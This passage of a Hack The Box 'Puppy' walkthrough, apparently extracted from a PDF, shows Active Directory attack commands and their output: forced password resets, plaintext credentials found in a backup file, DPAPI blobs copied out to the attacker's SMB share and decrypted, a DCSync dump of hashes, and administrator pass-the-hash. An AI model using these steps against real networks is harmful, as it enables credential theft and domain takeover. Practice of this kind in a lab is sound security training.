msPKIRoamingTimeStamp: WRITE
msDS-SourceObjectDN: WRITE
msDRM-IdentityCertificate: WRITE
msDS-AllowedToDelegateTo: WRITE
msIIS-FTPDir: WRITE
msIIS-FTPRoot: WRITE
lastLogonTimestamp: WRITE
msDS-Site-Affinity: WRITE
msDS-Cached-Membership-Time-Stamp: WRITE
msDS-Cached-Membership: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-CreatorSID: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
accountNameHistory: WRITE
proxiedObjectName: WRITE
msRASSavedFramedRoute: WRITE
msRASSavedFramedIPAddress: WRITE
msRASSavedCallbackNumber: WRITE
msRADIUSServiceType: WRITE
msRADIUSFramedRoute: WRITE
msRADIUSFramedIPAddress: WRITE
msRADIUSCallbackNumber: WRITE
msNPSavedCallingStationID: WRITE
msNPCallingStationID: WRITE
msNPAllowDialin: WRITE
mSMQSignCertificatesMig: WRITE
mSMQDigestsMig: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
uSNSource: WRITE
terminalServer: WRITE
Puppy 16
isCriticalSystemObject: WRITE
altSecurityIdentities: WRITE
lastKnownParent: WRITE
aCSPolicyName: WRITE
servicePrincipalName: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
partialAttributeDeletionList: WRITE
lockoutTime: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
assistant: WRITE
otherMailbox: WRITE
mhsORAddress: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
showInAddressBook: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
sIDHistory: WRITE
dynamicLDAPServer: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
groupPriority: WRITE
groupsToIgnore: WRITE
sAMAccountType: WRITE
wbemPath: WRITE
division: WRITE
defaultClassStore: WRITE
controlAccessRights: WRITE
logonCount: WRITE
groupMembershipSAM: WRITE
lmPwdHistory: WRITE
accountExpires: WRITE
comment: WRITE
rid: WRITE
adminCount: WRITE
revision: WRITE
operatorCount: WRITE
profilePath: WRITE
userParameters: WRITE
supplementalCredentials: WRITE
securityIdentifier: WRITE
primaryGroupID: WRITE
preferredOU: WRITE
pwdLastSet: WRITE
ntPwdHistory: WRITE
Puppy 17
otherLoginWorkstations: WRITE
unicodePwd: WRITE
userWorkstations: WRITE
maxStorage: WRITE
logonWorkstation: WRITE
logonHours: WRITE
scriptPath: WRITE
localeID: WRITE
dBCSPwd: WRITE
lastLogon: WRITE
lastLogoff: WRITE
badPasswordTime: WRITE
homeDrive: WRITE
homeDirectory: WRITE
flags: WRITE
employeeID: WRITE
countryCode: WRITE
codePage: WRITE
badPwdCount: WRITE
userAccountControl: WRITE
replUpToDateVector: WRITE
replPropertyMetaData: WRITE
objectGUID: WRITE
name: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
employeeType: WRITE
employeeNumber: WRITE
msExchHouseIdentifier: WRITE
msExchLabeledURI: WRITE
USNIntersite: WRITE
wWWHomePage: WRITE
networkAddress: WRITE
msExchAssistantName: WRITE
displayNamePrintable: WRITE
garbageCollPeriod: WRITE
otherHomePhone: WRITE
uSNDSALastObjRemoved: WRITE
streetAddress: WRITE
extensionName: WRITE
adminDescription: WRITE
proxyAddresses: WRITE
adminDisplayName: WRITE
showInAdvancedViewOnly: WRITE
company: WRITE
department: WRITE
co: WRITE
uSNLastObjRem: WRITE
uSNChanged: WRITE
otherPager: WRITE
repsFrom: WRITE
repsTo: WRITE
info: WRITE
objectVersion: WRITE
Puppy 18
dSASignature: WRITE
isDeleted: WRITE
uSNCreated: WRITE
otherTelephone: WRITE
displayName: WRITE
subRefs: WRITE
whenChanged: WRITE
whenCreated: WRITE
attributeCertificateAttribute: WRITE
houseIdentifier: WRITE
dn: WRITE
x500uniqueIdentifier: WRITE
generationQualifier: WRITE
initials: WRITE
givenName: WRITE
userCertificate: WRITE
userPassword: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
serialNumber: WRITE
sn: WRITE
objectCategory: WRITE
sAMAccountName: WRITE
objectSid: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
cn: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE
Puppy 19
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -A 20
"distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
Puppy 20
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -E "di
stinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
https://www.hackingarticles.in/forcechangepassword-active-directory-abuse/
㉿
┌──(kali kali)-[~]
└─$ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' xx.xx.xx.xx
Puppy 21
┌──(kali㉿kali)-[~]
└─$ nxc smb xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.H
TB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\ADAM.SILVER:Password@987
┌──(kali㉿kali)-[~]
└─$ crackmapexec winrm 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip xx.xx.xx.xx set password adam.silver 'Passw
ord@987'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-changepasswd puppy.htb/[email protected] -newpass 'Password@987' -altuser puppy.htb/an
t.edwards -altpass Antman2025! -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Puppy 22
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine
Directory: C:\Users\adam.silver\Desktop
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ ntpdate -u xx.xx.xx.xx | bloodhound-python -dc DC.PUPPY.HTB -u 'ADAM.SILVER' -p 'Password@987' -d PUP
PY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx
Puppy 23
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S
Directory: C:\Backups
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ ll
total 20
drwxrwxr-x 6 kali kali 4096 Dec 31 1979 assets
drwxrwxr-x 2 kali kali 4096 Dec 31 1979 images
-rw-rw-r-- 1 kali kali 7258 Dec 31 1979 index.html
-rw-r--r-- 1 kali kali 864 Dec 31 1979 nms-auth-config.xml.bak
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
Puppy 24
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!' -d PUPPY.HTB
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!'
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine
Puppy 25
ata\Roaming\Microsoft\Protect\
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-22812
16199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2
281216199-1107> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050
783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\xx.xx.14.xx\share\masterkey_blob
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2
281216199-1107>
===================================================================================
==
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Puppy 26
credential blob (foydalanuvchi credential ma’lumotlari, parollar yoki tokenlar saqlanadigan fayl) ham ko’chirdik
DPAPI bilan himoyalangan credential ma’lumotlarini offlayn parollarni yechish (decrypt) uchun ishlatamiz
SMB server ishga tushirib bu filelarni ko’chirib olamiz tepadegi jarayon paytida bu yoniq turishi kerak va biz create
qilgan share papkasiga tushadi Masterkey va Credential blob
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ mkdir -p ./share
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ ll
total 8
-rwxrwxr-x 1 kali kali 414 Mar 8 10:54 credential_blob
-rwxrwxr-x 1 kali kali 740 Mar 8 10:40 masterkey_blob
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py masterkey -file masterkey_blob -password 'Che
fSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Puppy 27
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722f
baf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28
408d8d9cbfdcaf319e9c84
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
password: FivethChipOnItsWay2025!
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d PUPPY.HTB -
c All -o bloodhound_results.json -ns xx.xx.xx.xx
Puppy 28
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 21S
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ zip bloodhound_results.zip bloodhound_results.json_20250517180922_*.json
adding: bloodhound_results.json_20250517180922_computers.json (deflated 74%)
adding: bloodhound_results.json_20250517180922_containers.json (deflated 93%)
adding: bloodhound_results.json_20250517180922_domains.json (deflated 77%)
adding: bloodhound_results.json_20250517180922_gpos.json (deflated 89%)
adding: bloodhound_results.json_20250517180922_groups.json (deflated 94%)
adding: bloodhound_results.json_20250517180922_ous.json (deflated 83%)
adding: bloodhound_results.json_20250517180922_users.json (deflated 93%)
steph.cooper_adm userida DCSync huquqi borakan. Biz bu huquqdan foydalanib administrator hashini olishga yani
DCSync hujumini amalga oshiramiz
┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py PUPPY.HTB/steph.cooper_adm:'FivethC
hipOnItsWay2025!'@xx.xx.xx.xx
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Puppy 29
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebd
a45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0
bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3a
fb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b4
19fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fc
d48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f035
82a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61
779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d775b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f117
3:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c59
6c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d
585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac1
27e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9a
Puppy 30
fab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc
183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f
4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468f
ff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
[*] Cleaning up...
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d775b' -d PUPPY.HT
B
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\administrator:bb0edc15e49ceb4120c7bd7e6e65d75
b (Pwn3d!)
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d775b'
Puppy 31
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine
Directory: C:\Users\Administrator\Desktop
Puppy 32